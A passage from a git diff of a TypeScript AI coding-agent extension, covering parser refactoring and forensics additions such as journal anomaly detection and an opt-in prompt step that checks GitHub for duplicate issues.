+ */ +export function isTransientNetworkError(errorMsg: string): boolean { + if (!errorMsg) return false; + const cls = classifyError(errorMsg); + return cls.kind === "network"; +} diff --git a/src/resources/extensions/gsd/extension-manifest.json b/src/resources/extensions/gsd/extension-manifest.json index a1b2877be..ca0063a5f 100644 --- a/src/resources/extensions/gsd/extension-manifest.json +++ b/src/resources/extensions/gsd/extension-manifest.json @@ -12,7 +12,22 @@ "gsd_requirement_update", "gsd_milestone_generate_id" ], "commands": ["gsd", "kill", "worktree", "exit"], - "hooks": ["session_start"], + "hooks": [ + "session_start", + "session_switch", + "bash_transform", + "session_fork", + "before_agent_start", + "agent_end", + "session_before_compact", + "session_shutdown", + "tool_call", + "tool_result", + "tool_execution_start", + "tool_execution_end", + "model_select", + "before_provider_request" + ], "shortcuts": ["Ctrl+Alt+G"] } } diff --git a/src/resources/extensions/gsd/file-watcher.ts b/src/resources/extensions/gsd/file-watcher.ts index 98928ed62..a8b0be19c 100644 --- a/src/resources/extensions/gsd/file-watcher.ts +++ b/src/resources/extensions/gsd/file-watcher.ts @@ -3,6 +3,7 @@ import type { EventBus } from "@gsd/pi-coding-agent"; import { relative } from "node:path"; let watcher: FSWatcher | null = null; +let pending = new Map>(); const EVENT_MAP: Record = { "settings.json": "settings-changed", @@ -36,7 +37,7 @@ export async function startFileWatcher( const { watch } = await import("chokidar"); - const pending = new Map>(); + pending = new Map>(); function debounceEmit(event: string): void { const existing = pending.get(event); @@ -90,6 +91,8 @@ export async function startFileWatcher( * Stop the file watcher and clean up resources. 
*/ export async function stopFileWatcher(): Promise { + for (const timer of pending.values()) clearTimeout(timer); + pending.clear(); if (watcher) { await watcher.close(); watcher = null; diff --git a/src/resources/extensions/gsd/files.ts b/src/resources/extensions/gsd/files.ts index c5d7fada0..a59a8773a 100644 --- a/src/resources/extensions/gsd/files.ts +++ b/src/resources/extensions/gsd/files.ts @@ -10,8 +10,7 @@ import { resolveMilestoneFile, relMilestoneFile, resolveGsdRootFile } from './pa import { milestoneIdSort, findMilestoneIds } from './milestone-ids.js'; import type { - Roadmap, BoundaryMapEntry, - SlicePlan, TaskPlanEntry, TaskPlanFile, TaskPlanFrontmatter, + TaskPlanFile, TaskPlanFrontmatter, Summary, SummaryFrontmatter, SummaryRequires, FileModified, Continue, ContinueFrontmatter, ContinueStatus, RequirementCounts, @@ -21,9 +20,7 @@ import type { } from './types.js'; import { checkExistingEnvKeys } from './env-utils.js'; -import { parseRoadmapSlices } from './roadmap-slices.js'; -import { nativeParseRoadmap, nativeExtractSection, nativeParsePlanFile, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js'; -import { debugTime, debugCount } from './debug-logger.js'; +import { nativeExtractSection, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js'; import { CACHE_MAX } from './constants.js'; import { splitFrontmatter, parseFrontmatterMap } from '../shared/frontmatter.js'; @@ -55,9 +52,41 @@ function cachedParse(content: string, tag: string, parseFn: (c: string) => T) return result; } -/** Clear the module-scoped parse cache. Call when files change on disk. */ +// ─── Cross-module cache clear registry ──────────────────────────────────── +// parsers-legacy.ts registers its cache-clear callback here at module init +// to avoid circular imports. clearParseCache() calls all registered callbacks. 
+const _cacheClearCallbacks: (() => void)[] = []; + +/** Register a callback to be invoked when clearParseCache() is called. + * Used by parsers-legacy.ts to synchronously clear its own cache. */ +export function registerCacheClearCallback(cb: () => void): void { + _cacheClearCallbacks.push(cb); +} + +/** Clear the module-scoped parse cache. Call when files change on disk. + * Also clears any registered external caches (e.g. parsers-legacy.ts). */ export function clearParseCache(): void { _parseCache.clear(); + for (const cb of _cacheClearCallbacks) cb(); +} + +// ─── Platform shortcuts ─────────────────────────────────────────────────── + +const IS_MAC = process.platform === "darwin"; + +/** + * Format a keyboard shortcut for the current OS. + * Input: modifier key combo like "Ctrl+Alt+G" + * Output: "⌃⌥G" on macOS, "Ctrl+Alt+G" on Windows/Linux. + */ +export function formatShortcut(combo: string): string { + if (!IS_MAC) return combo; + return combo + .replace(/Ctrl\+Alt\+/i, "⌃⌥") + .replace(/Ctrl\+/i, "⌃") + .replace(/Alt\+/i, "⌥") + .replace(/Shift\+/i, "⇧") + .replace(/Cmd\+/i, "⌘"); } // ─── Helpers ─────────────────────────────────────────────────────────────── @@ -103,6 +132,25 @@ function escapeRegex(s: string): string { return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); } +/** + * Normalize a task-plan file reference that may include inline description text + * after the path, for example: + * "docs/file.md — explanation" + * "docs/file.md - explanation" + */ +export function normalizePlannedFileReference(value: string): string { + const trimmed = value.trim().replace(/`/g, ""); + const match = /^(.*?)(?:\s+(?:—|-)\s+)(.+)$/.exec(trimmed); + if (!match) return trimmed; + + const pathCandidate = match[1].trim(); + if (pathCandidate.includes("/") || pathCandidate.includes("\\") || pathCandidate.includes(".")) { + return pathCandidate; + } + + return trimmed; +} + /** Parse bullet list items from a text block. 
*/ export function parseBullets(text: string): string[] { return text.split('\n') @@ -117,95 +165,6 @@ export function extractBoldField(text: string, key: string): string | null { return match ? match[1].trim() : null; } -// ─── Roadmap Parser ──────────────────────────────────────────────────────── - -export function parseRoadmap(content: string): Roadmap { - return cachedParse(content, 'roadmap', _parseRoadmapImpl); -} - -function _parseRoadmapImpl(content: string): Roadmap { - const stopTimer = debugTime("parse-roadmap"); - // Try native parser first for better performance - const nativeResult = nativeParseRoadmap(content); - if (nativeResult) { - stopTimer({ native: true, slices: nativeResult.slices.length, boundaryEntries: nativeResult.boundaryMap.length }); - debugCount("parseRoadmapCalls"); - return nativeResult; - } - - const lines = content.split('\n'); - - const h1 = lines.find(l => l.startsWith('# ')); - const title = h1 ? h1.slice(2).trim() : ''; - const vision = extractBoldField(content, 'Vision') || ''; - - const scSection = extractSection(content, 'Success Criteria', 2) || - (() => { - const idx = content.indexOf('**Success Criteria:**'); - if (idx === -1) return ''; - const rest = content.slice(idx); - const nextSection = rest.indexOf('\n---'); - const block = rest.slice(0, nextSection === -1 ? undefined : nextSection); - const firstNewline = block.indexOf('\n'); - return firstNewline === -1 ? '' : block.slice(firstNewline + 1); - })(); - const successCriteria = scSection ? 
parseBullets(scSection) : []; - - // Slices - const slices = parseRoadmapSlices(content); - - // Boundary map - const boundaryMap: BoundaryMapEntry[] = []; - const bmSection = extractSection(content, 'Boundary Map'); - - if (bmSection) { - const h3Sections = extractAllSections(bmSection, 3); - for (const [heading, sectionContent] of h3Sections) { - const arrowMatch = heading.match(/^(\S+)\s*→\s*(\S+)/); - if (!arrowMatch) continue; - - const fromSlice = arrowMatch[1]; - const toSlice = arrowMatch[2]; - - let produces = ''; - let consumes = ''; - - // Use indexOf-based parsing instead of [\s\S]*? regex to avoid - // catastrophic backtracking on content with code fences (#468). - const prodIdx = sectionContent.search(/^Produces:\s*$/m); - if (prodIdx !== -1) { - const afterProd = sectionContent.indexOf('\n', prodIdx); - if (afterProd !== -1) { - const consIdx = sectionContent.search(/^Consumes/m); - const endIdx = consIdx !== -1 && consIdx > afterProd ? consIdx : sectionContent.length; - produces = sectionContent.slice(afterProd + 1, endIdx).trim(); - } - } - - const consLineMatch = sectionContent.match(/^Consumes[^:]*:\s*(.+)$/m); - if (consLineMatch) { - consumes = consLineMatch[1].trim(); - } - if (!consumes) { - const consIdx = sectionContent.search(/^Consumes[^:]*:\s*$/m); - if (consIdx !== -1) { - const afterCons = sectionContent.indexOf('\n', consIdx); - if (afterCons !== -1) { - consumes = sectionContent.slice(afterCons + 1).trim(); - } - } - } - - boundaryMap.push({ fromSlice, toSlice, produces, consumes }); - } - } - - const result = { title, vision, successCriteria, slices, boundaryMap }; - stopTimer({ native: false, slices: slices.length, boundaryEntries: boundaryMap.length }); - debugCount("parseRoadmapCalls"); - return result; -} - // ─── Secrets Manifest Parser ─────────────────────────────────────────────── const VALID_STATUSES = new Set(['pending', 'collected', 'skipped']); @@ -314,131 +273,6 @@ export function parseTaskPlanFile(content: string): 
TaskPlanFile { }; } -export function parsePlan(content: string): SlicePlan { - return cachedParse(content, 'plan', _parsePlanImpl); -} - -function _parsePlanImpl(content: string): SlicePlan { - const stopTimer = debugTime("parse-plan"); - const [, body] = splitFrontmatter(content); - // Try native parser first for better performance - const nativeResult = nativeParsePlanFile(body); - if (nativeResult) { - stopTimer({ native: true }); - return { - id: nativeResult.id, - title: nativeResult.title, - goal: nativeResult.goal, - demo: nativeResult.demo, - mustHaves: nativeResult.mustHaves, - tasks: nativeResult.tasks.map(t => ({ - id: t.id, - title: t.title, - description: t.description, - done: t.done, - estimate: t.estimate, - ...(t.files.length > 0 ? { files: t.files } : {}), - ...(t.verify ? { verify: t.verify } : {}), - })), - filesLikelyTouched: nativeResult.filesLikelyTouched, - }; - } - - const lines = body.split('\n'); - - const h1 = lines.find(l => l.startsWith('# ')); - let id = ''; - let title = ''; - if (h1) { - const match = h1.match(/^#\s+(\w+):\s+(.+)/); - if (match) { - id = match[1]; - title = match[2].trim(); - } else { - title = h1.slice(2).trim(); - } - } - - const goal = extractBoldField(body, 'Goal') || ''; - const demo = extractBoldField(body, 'Demo') || ''; - - const mhSection = extractSection(body, 'Must-Haves'); - const mustHaves = mhSection ? parseBullets(mhSection) : []; - - const tasksSection = extractSection(body, 'Tasks'); - const tasks: TaskPlanEntry[] = []; - - if (tasksSection) { - const taskLines = tasksSection.split('\n'); - let currentTask: TaskPlanEntry | null = null; - - for (const line of taskLines) { - const cbMatch = line.match(/^-\s+\[([ xX])\]\s+\*\*([\w.]+):\s+(.+?)\*\*\s*(.*)/); - // Heading-style: ### T01 -- Title, ### T01: Title, ### T01 — Title - const hdMatch = !cbMatch ? 
line.match(/^#{2,4}\s+([\w.]+)\s*(?:--|—|:)\s*(.+)/) : null; - if (cbMatch || hdMatch) { - if (currentTask) tasks.push(currentTask); - - if (cbMatch) { - const rest = cbMatch[4] || ''; - const estMatch = rest.match(/`est:([^`]+)`/); - const estimate = estMatch ? estMatch[1] : ''; - - currentTask = { - id: cbMatch[2], - title: cbMatch[3], - description: '', - done: cbMatch[1].toLowerCase() === 'x', - estimate, - }; - } else { - const rest = hdMatch![2] || ''; - const titleEstMatch = rest.match(/^(.+?)\s*`est:([^`]+)`\s*$/); - const title = titleEstMatch ? titleEstMatch[1].trim() : rest.trim(); - const estimate = titleEstMatch ? titleEstMatch[2] : ''; - - currentTask = { - id: hdMatch![1], - title, - description: '', - done: false, - estimate, - }; - } - } else if (currentTask && line.match(/^\s*-\s+Files:\s*(.*)/)) { - const filesMatch = line.match(/^\s*-\s+Files:\s*(.*)/); - if (filesMatch) { - currentTask.files = filesMatch[1] - .split(',') - .map(f => f.replace(/`/g, '').trim()) - .filter(f => f.length > 0); - } - } else if (currentTask && line.match(/^\s*-\s+Verify:\s*(.*)/)) { - const verifyMatch = line.match(/^\s*-\s+Verify:\s*(.*)/); - if (verifyMatch) { - currentTask.verify = verifyMatch[1].trim(); - } - } else if (currentTask && line.trim() && !line.startsWith('#')) { - const desc = line.trim(); - if (desc) { - currentTask.description = currentTask.description - ? currentTask.description + ' ' + desc - : desc; - } - } - } - if (currentTask) tasks.push(currentTask); - } - - const filesSection = extractSection(body, 'Files Likely Touched'); - const filesLikelyTouched = filesSection ? 
parseBullets(filesSection) : []; - - const result = { id, title, goal, demo, mustHaves, tasks, filesLikelyTouched }; - stopTimer({ tasks: tasks.length }); - debugCount("parsePlanCalls"); - return result; -} - // ─── Summary Parser ──────────────────────────────────────────────────────── export function parseSummary(content: string): Summary { @@ -473,6 +307,8 @@ function _parseSummaryImpl(content: string): Summary { whatHappened: nativeResult.whatHappened, deviations: nativeResult.deviations, filesModified: nativeResult.filesModified, + followUps: extractSection(content, 'Follow-ups') ?? '', + knownLimitations: extractSection(content, 'Known Limitations') ?? '', }; } @@ -534,7 +370,10 @@ function _parseSummaryImpl(content: string): Summary { } } - return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified }; + const followUps = extractSection(body, 'Follow-ups') ?? ''; + const knownLimitations = extractSection(body, 'Known Limitations') ?? ''; + + return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified, followUps, knownLimitations }; } // ─── Continue Parser ─────────────────────────────────────────────────────── @@ -802,11 +641,11 @@ export function parseTaskPlanIO(content: string): { inputFiles: string[]; output let match: RegExpExecArray | null; backtickPathRegex.lastIndex = 0; while ((match = backtickPathRegex.exec(trimmed)) !== null) { - const candidate = match[1]; + const candidate = normalizePlannedFileReference(match[1]); // Filter out things that look like code tokens rather than file paths // (e.g. `true`, `false`, `npm run test`). A file path has at least one // dot or slash. 
- if (candidate.includes("/") || candidate.includes(".")) { + if (candidate.includes("/") || candidate.includes("\\") || candidate.includes(".")) { paths.push(candidate); } } diff --git a/src/resources/extensions/gsd/forensics.ts b/src/resources/extensions/gsd/forensics.ts index 62c89279d..ba2746f8b 100644 --- a/src/resources/extensions/gsd/forensics.ts +++ b/src/resources/extensions/gsd/forensics.ts @@ -28,13 +28,18 @@ import { deriveState } from "./state.js"; import { isAutoActive } from "./auto.js"; import { loadPrompt } from "./prompt-loader.js"; import { gsdRoot } from "./paths.js"; +import { isDbAvailable, getAllMilestones, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; +import { isClosedStatus } from "./status-guards.js"; import { formatDuration } from "../shared/format-utils.js"; import { getAutoWorktreePath } from "./auto-worktree.js"; +import { loadEffectiveGSDPreferences, loadGlobalGSDPreferences, getGlobalGSDPreferencesPath } from "./preferences.js"; +import { showNextAction } from "../shared/tui.js"; +import { ensurePreferencesFile, serializePreferencesToFrontmatter } from "./commands-prefs-wizard.js"; // ─── Types ──────────────────────────────────────────────────────────────────── -interface ForensicAnomaly { - type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace"; +export interface ForensicAnomaly { + type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace" | "journal-stuck" | "journal-guard-block" | "journal-rapid-iterations" | "journal-worktree-failure"; severity: "info" | "warning" | "error"; unitType?: string; unitId?: string; @@ -51,6 +56,46 @@ interface UnitTrace { mtime: number; } +/** Summary of .gsd/activity/ directory metadata. 
*/ +interface ActivityLogMeta { + fileCount: number; + totalSizeBytes: number; + oldestFile: string | null; + newestFile: string | null; +} + +/** + * Summary of .gsd/journal/ data for forensic investigation. + * + * To avoid loading huge journal histories into memory, only the most recent + * daily files are fully parsed. Older files are line-counted for totals. + * Event counts and flow IDs reflect only recent files. + */ +interface JournalSummary { + /** Total journal entries across all files (recent parsed + older line-counted) */ + totalEntries: number; + /** Distinct flow IDs from recent files (each = one auto-mode iteration) */ + flowCount: number; + /** Event counts by type (from recent files only) */ + eventCounts: Record; + /** Most recent journal entries (last 20) for context */ + recentEvents: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[]; + /** Date range of journal data */ + oldestEntry: string | null; + newestEntry: string | null; + /** Daily file count */ + fileCount: number; +} + +interface DbCompletionCounts { + milestones: number; + milestonesTotal: number; + slices: number; + slicesTotal: number; + tasks: number; + tasksTotal: number; +} + interface ForensicReport { gsdVersion: string; timestamp: string; @@ -61,10 +106,76 @@ interface ForensicReport { unitTraces: UnitTrace[]; metrics: MetricsLedger | null; completedKeys: string[]; + dbCompletionCounts: DbCompletionCounts | null; crashLock: LockData | null; doctorIssues: DoctorIssue[]; anomalies: ForensicAnomaly[]; recentUnits: { type: string; id: string; cost: number; duration: number; model: string; finishedAt: number }[]; + journalSummary: JournalSummary | null; + activityLogMeta: ActivityLogMeta | null; +} + +// ─── Duplicate Detection ────────────────────────────────────────────────────── + +const DEDUP_PROMPT_SECTION = ` +## Pre-Investigation: Duplicate Check (REQUIRED) + +Before reading GSD source code or performing deep analysis, you MUST search for 
existing issues and PRs that may already address this bug. This avoids wasting tokens on already-fixed bugs. + +### Search Steps + +Use keywords from the user's problem description and the anomaly summaries in the forensic report above. + +1. **Search closed issues** for similar keywords: + \`\`\` + gh issue list --repo gsd-build/gsd-2 --state closed --search "" --limit 20 + \`\`\` + +2. **Search open PRs** that might contain the fix: + \`\`\` + gh pr list --repo gsd-build/gsd-2 --state open --search "" --limit 10 + \`\`\` + +3. **Search merged PRs** that may have already fixed this: + \`\`\` + gh pr list --repo gsd-build/gsd-2 --state merged --search "" --limit 10 + \`\`\` + +### Analysis + +For each result, compare it against the user's reported symptoms and the forensic anomalies: +- Does the issue describe the same code path or file? +- Does the PR modify the area related to the reported symptoms? +- Is the symptom description semantically similar even if keywords differ? + +### Decision Gate + +- **Merged PR clearly fixes the described symptom** → Report "Already fixed by PR #X" with brief explanation. Skip full investigation. +- **Open issue matches** → Report "Existing issue #Y covers this." Offer to add forensic evidence. Skip full investigation unless user asks for deeper analysis. +- **No matches** → Proceed to full investigation below. +`; + +async function writeForensicsDedupPref(ctx: ExtensionCommandContext, enabled: boolean): Promise { + const prefsPath = getGlobalGSDPreferencesPath(); + await ensurePreferencesFile(prefsPath, ctx, "global"); + const existing = loadGlobalGSDPreferences(); + const prefs: Record = existing?.preferences ? { ...existing.preferences } : {}; + prefs.version = prefs.version || 1; + prefs.forensics_dedup = enabled; + + const frontmatter = serializePreferencesToFrontmatter(prefs); + const raw = existsSync(prefsPath) ? 
readFileSync(prefsPath, "utf-8") : ""; + let body = "\n# GSD Skill Preferences\n\nSee `~/.gsd/agent/extensions/gsd/docs/preferences-reference.md` for full field documentation and examples.\n"; + const start = raw.startsWith("---\n") ? 4 : raw.startsWith("---\r\n") ? 5 : -1; + if (start !== -1) { + const closingIdx = raw.indexOf("\n---", start); + if (closingIdx !== -1) { + const after = raw.slice(closingIdx + 4); + if (after.trim()) body = after; + } + } + + writeFileSync(prefsPath, `---\n${frontmatter}---${body}`, "utf-8"); } // ─── Entry Point ────────────────────────────────────────────────────────────── @@ -98,6 +209,29 @@ export async function handleForensics( return; } + // ─── Duplicate detection opt-in ───────────────────────────────────────────── + const effectivePrefs = loadEffectiveGSDPreferences()?.preferences; + let dedupEnabled = effectivePrefs?.forensics_dedup === true; + + if (effectivePrefs?.forensics_dedup === undefined) { + const choice = await showNextAction(ctx, { + title: "Duplicate detection available", + summary: ["Before filing a GitHub issue, forensics can search existing issues and PRs to avoid duplicates.", "This uses additional AI tokens for analysis."], + actions: [ + { id: "enable", label: "Enable duplicate detection", description: "Search issues/PRs before filing (recommended)", recommended: true }, + { id: "skip", label: "Skip for now", description: "File without checking for duplicates" }, + ], + notYetMessage: "You can enable this later via preferences (forensics_dedup: true).", + }); + + if (choice === "enable") { + await writeForensicsDedupPref(ctx, true); + dedupEnabled = true; + } + } + + const dedupSection = dedupEnabled ? 
DEDUP_PROMPT_SECTION : ""; + ctx.ui.notify("Building forensic report...", "info"); const report = await buildForensicReport(basePath); @@ -117,6 +251,7 @@ export async function handleForensics( problemDescription, forensicData, gsdSourceDir, + dedupSection, }); ctx.ui.notify(`Forensic report saved: ${relative(basePath, savedPath)}`, "info"); @@ -125,6 +260,9 @@ export async function handleForensics( { customType: "gsd-forensics", content, display: false }, { triggerTurn: true }, ); + + // Persist forensics context so follow-up turns can re-inject it (#2941) + writeForensicsMarker(basePath, savedPath, content); } // ─── Report Builder ─────────────────────────────────────────────────────────── @@ -150,8 +288,9 @@ export async function buildForensicReport(basePath: string): Promise f.endsWith(".jsonl")).sort(); + if (files.length === 0) return null; + + // Split into recent (fully parsed) and older (line-counted only) + const recentFiles = files.slice(-MAX_JOURNAL_RECENT_FILES); + const olderFiles = files.slice(0, -MAX_JOURNAL_RECENT_FILES); + + // Line-count older files without parsing — avoids loading megabytes of JSON + let olderEntryCount = 0; + let oldestEntry: string | null = null; + for (const file of olderFiles) { + try { + const raw = readFileSync(join(journalDir, file), "utf-8"); + const lines = raw.split("\n"); + for (const line of lines) { + if (!line.trim()) continue; + olderEntryCount++; + // Extract only the timestamp from the first non-empty line of the oldest file + if (!oldestEntry) { + try { + const parsed = JSON.parse(line) as { ts?: string }; + if (parsed.ts) oldestEntry = parsed.ts; + } catch { /* skip malformed */ } + } + } + } catch { /* skip unreadable files */ } + } + + // Fully parse recent files for event counts and timeline + const eventCounts: Record = {}; + const flowIds = new Set(); + const recentParsedEntries: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[] = []; + let recentEntryCount = 0; + + for 
(const file of recentFiles) { + try { + const raw = readFileSync(join(journalDir, file), "utf-8"); + for (const line of raw.split("\n")) { + if (!line.trim()) continue; + try { + const entry = JSON.parse(line) as { ts: string; flowId: string; eventType: string; rule?: string; data?: Record }; + recentEntryCount++; + eventCounts[entry.eventType] = (eventCounts[entry.eventType] ?? 0) + 1; + flowIds.add(entry.flowId); + + if (!oldestEntry) oldestEntry = entry.ts; + + // Keep a rolling window of last N events — avoids accumulating unbounded arrays + recentParsedEntries.push({ + ts: entry.ts, + flowId: entry.flowId, + eventType: entry.eventType, + rule: entry.rule, + unitId: entry.data?.unitId as string | undefined, + }); + if (recentParsedEntries.length > MAX_JOURNAL_RECENT_EVENTS) { + recentParsedEntries.shift(); + } + } catch { /* skip malformed lines */ } + } + } catch { /* skip unreadable files */ } + } + + const totalEntries = olderEntryCount + recentEntryCount; + if (totalEntries === 0) return null; + + const newestEntry = recentParsedEntries.length > 0 + ? 
recentParsedEntries[recentParsedEntries.length - 1]!.ts + : null; + + return { + totalEntries, + flowCount: flowIds.size, + eventCounts, + recentEvents: recentParsedEntries, + oldestEntry, + newestEntry, + fileCount: files.length, + }; + } catch { + return null; + } +} + +// ─── Activity Log Metadata ──────────────────────────────────────────────────── + +function gatherActivityLogMeta(basePath: string, activeMilestone?: string | null): ActivityLogMeta | null { + try { + const activityDirs = resolveActivityDirs(basePath, activeMilestone); + let fileCount = 0; + let totalSizeBytes = 0; + let oldestFile: string | null = null; + let newestFile: string | null = null; + let oldestMtime = Infinity; + let newestMtime = 0; + + for (const activityDir of activityDirs) { + if (!existsSync(activityDir)) continue; + const files = readdirSync(activityDir).filter(f => f.endsWith(".jsonl")); + for (const file of files) { + const filePath = join(activityDir, file); + const stat = statSync(filePath, { throwIfNoEntry: false }); + if (!stat) continue; + fileCount++; + totalSizeBytes += stat.size; + if (stat.mtimeMs < oldestMtime) { + oldestMtime = stat.mtimeMs; + oldestFile = file; + } + if (stat.mtimeMs > newestMtime) { + newestMtime = stat.mtimeMs; + newestFile = file; + } + } + } + + if (fileCount === 0) return null; + return { fileCount, totalSizeBytes, oldestFile, newestFile }; + } catch { + return null; + } +} + // ─── Completed Keys Loader ──────────────────────────────────────────────────── function loadCompletedKeys(basePath: string): string[] { @@ -300,15 +600,69 @@ function loadCompletedKeys(basePath: string): string[] { return []; } +// ─── DB Completion Counts ──────────────────────────────────────────────────── + +function getDbCompletionCounts(): DbCompletionCounts | null { + if (!isDbAvailable()) return null; + + const milestones = getAllMilestones(); + let completedMilestones = 0; + let totalSlices = 0; + let completedSlices = 0; + let totalTasks = 0; + let 
completedTasks = 0; + + for (const m of milestones) { + if (isClosedStatus(m.status)) completedMilestones++; + + const slices = getMilestoneSlices(m.id); + for (const s of slices) { + totalSlices++; + if (isClosedStatus(s.status)) completedSlices++; + + const tasks = getSliceTasks(m.id, s.id); + for (const t of tasks) { + totalTasks++; + if (isClosedStatus(t.status)) completedTasks++; + } + } + } + + return { + milestones: completedMilestones, + milestonesTotal: milestones.length, + slices: completedSlices, + slicesTotal: totalSlices, + tasks: completedTasks, + tasksTotal: totalTasks, + }; +} + // ─── Anomaly Detectors ─────────────────────────────────────────────────────── -function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void { - const counts = new Map(); +/** + * Detect units that were dispatched multiple times (stuck in a loop). + * + * Counts distinct dispatches by grouping on (type, id, startedAt) first to + * collapse idle-watchdog duplicate snapshots (#1943), then counts unique + * startedAt values per type/id to determine actual dispatch count. + * + * Exported for testability. + */ +export function detectStuckLoops(units: UnitMetrics[], anomalies: ForensicAnomaly[]): void { + // First, collect unique startedAt values per type/id key + const dispatchMap = new Map>(); for (const u of units) { const key = `${u.type}/${u.id}`; - counts.set(key, (counts.get(key) ?? 0) + 1); + let starts = dispatchMap.get(key); + if (!starts) { + starts = new Set(); + dispatchMap.set(key, starts); + } + starts.add(u.startedAt); } - for (const [key, count] of counts) { + for (const [key, starts] of dispatchMap) { + const count = starts.size; if (count > 1) { const [unitType, ...idParts] = key.split("/"); anomalies.push({ @@ -364,15 +718,42 @@ function detectTimeouts(traces: UnitTrace[], anomalies: ForensicAnomaly[]): void } } +/** + * Parse a completed-unit key into its unitType and unitId. 
+ * + * Hook units use a compound slash-delimited type ("hook/<name>"), so a + * naive `key.indexOf("/")` would split "hook/telegram-progress/M007/S01" into + * unitType="hook" (wrong) instead of "hook/telegram-progress". + * + * Returns `null` for malformed keys that cannot be split. + */ +export function splitCompletedKey(key: string): { unitType: string; unitId: string } | null { + if (key.startsWith("hook/")) { + // Hook unit types are two segments: "hook/<name>/<unitId>" + const secondSlash = key.indexOf("/", 5); // skip past "hook/" + if (secondSlash === -1) return null; // malformed — no unitId after hook name + return { + unitType: key.slice(0, secondSlash), + unitId: key.slice(secondSlash + 1), + }; + } + + const slashIdx = key.indexOf("/"); + if (slashIdx === -1) return null; + return { + unitType: key.slice(0, slashIdx), + unitId: key.slice(slashIdx + 1), + }; +} + function detectMissingArtifacts(completedKeys: string[], basePath: string, activeMilestone: string | null, anomalies: ForensicAnomaly[]): void { // Also check the worktree path for artifacts — they may exist there but not at root const wtBasePath = activeMilestone ? getAutoWorktreePath(basePath, activeMilestone) : null; for (const key of completedKeys) { - const slashIdx = key.indexOf("/"); - if (slashIdx === -1) continue; - const unitType = key.slice(0, slashIdx); - const unitId = key.slice(slashIdx + 1); + const parsed = splitCompletedKey(key); + if (!parsed) continue; + const { unitType, unitId } = parsed; const rootHasArtifact = verifyExpectedArtifact(unitType, unitId, basePath); const wtHasArtifact = wtBasePath ? 
verifyExpectedArtifact(unitType, unitId, wtBasePath) : false; @@ -432,6 +813,66 @@ function detectErrorTraces(traces: UnitTrace[], anomalies: ForensicAnomaly[]): v } } +function detectJournalAnomalies(journal: JournalSummary | null, anomalies: ForensicAnomaly[]): void { + if (!journal) return; + + // Detect stuck-detected events from the journal + const stuckCount = journal.eventCounts["stuck-detected"] ?? 0; + if (stuckCount > 0) { + anomalies.push({ + type: "journal-stuck", + severity: stuckCount >= 3 ? "error" : "warning", + summary: `Journal recorded ${stuckCount} stuck-detected event(s)`, + details: `The auto-mode loop detected it was stuck ${stuckCount} time(s). Check journal events for flow IDs and causal chains to trace the root cause.`, + }); + } + + // Detect guard-block events (dispatch was blocked by a guard) + const guardCount = journal.eventCounts["guard-block"] ?? 0; + if (guardCount > 0) { + anomalies.push({ + type: "journal-guard-block", + severity: guardCount >= 5 ? "warning" : "info", + summary: `Journal recorded ${guardCount} guard-block event(s)`, + details: `Dispatch was blocked by a guard condition ${guardCount} time(s). This may indicate a persistent blocking condition preventing progress.`, + }); + } + + // Detect rapid iterations (many flows in short time = likely thrashing) + if (journal.flowCount > 0 && journal.oldestEntry && journal.newestEntry) { + const oldest = new Date(journal.oldestEntry).getTime(); + const newest = new Date(journal.newestEntry).getTime(); + const spanMs = newest - oldest; + if (spanMs > 0 && journal.flowCount > 10) { + const avgMs = spanMs / journal.flowCount; + if (avgMs < RAPID_ITERATION_THRESHOLD_MS) { + anomalies.push({ + type: "journal-rapid-iterations", + severity: "warning", + summary: `${journal.flowCount} iterations in ${formatDuration(spanMs)} (avg ${formatDuration(avgMs)}/iteration)`, + details: `Unusually rapid iteration cadence suggests the loop may be thrashing without making progress. 
Review recent journal events for dispatch-stop or terminal events.`, + }); + } + } + } + + // Detect worktree failures from journal events + const wtCreateFailed = journal.eventCounts["worktree-create-failed"] ?? 0; + const wtMergeFailed = journal.eventCounts["worktree-merge-failed"] ?? 0; + const wtFailures = wtCreateFailed + wtMergeFailed; + if (wtFailures > 0) { + const parts: string[] = []; + if (wtCreateFailed > 0) parts.push(`${wtCreateFailed} create failure(s)`); + if (wtMergeFailed > 0) parts.push(`${wtMergeFailed} merge failure(s)`); + anomalies.push({ + type: "journal-worktree-failure", + severity: "warning", + summary: `Worktree failures: ${parts.join(", ")}`, + details: `Journal recorded worktree operation failures. These may indicate git state corruption or conflicting branches.`, + }); + } +} + // ─── Report Persistence ─────────────────────────────────────────────────────── function saveForensicReport(basePath: string, report: ForensicReport, problemDescription: string): string { @@ -508,10 +949,85 @@ function saveForensicReport(basePath: string, report: ForensicReport, problemDes sections.push(redact(formatCrashInfo(report.crashLock)), ``); } + // Activity log metadata + if (report.activityLogMeta) { + const meta = report.activityLogMeta; + sections.push(`## Activity Log Metadata`, ``); + sections.push(`- Files: ${meta.fileCount}`); + sections.push(`- Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`); + if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`); + if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`); + sections.push(``); + } + + // Journal summary + if (report.journalSummary) { + const js = report.journalSummary; + sections.push(`## Journal Summary`, ``); + sections.push(`- Total entries: ${js.totalEntries}`); + sections.push(`- Distinct flows (iterations): ${js.flowCount}`); + sections.push(`- Daily files: ${js.fileCount}`); + if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — 
